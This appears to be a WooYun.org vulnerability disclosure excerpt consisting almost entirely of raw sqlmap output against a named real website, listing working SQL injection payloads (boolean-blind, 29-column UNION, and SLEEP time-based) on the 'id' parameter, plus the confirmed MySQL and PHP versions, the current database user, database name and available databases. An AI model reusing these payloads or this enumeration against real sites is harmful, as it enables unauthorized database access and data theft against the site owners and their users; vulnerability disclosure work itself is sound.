WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5 AND 6981=6981&zid=14&en=c id=5 AND 6981=6981
    Type: UNION query
    Title: MySQL UNION query (NULL) - 29 columns
    Payload: id=5 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786b71,0x48794f6f524459425450,0x7164757071
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&zid=14&
en=c id=5 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,CONCAT(0x717a786b71,0x48794f6f524459425450,0x7164757071),NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=5 AND SLEEP(5)&zid=14&en=c id=5 AND SLEEP(5)
---
[16:08:52] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[16:08:52] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.cnpamirs.com'
[*] shutting down at 16:08:52

current user:    'web440507@%'
current database:    'db_web440507'

available databases [2]:
[*] db_web440507
[*] information_schema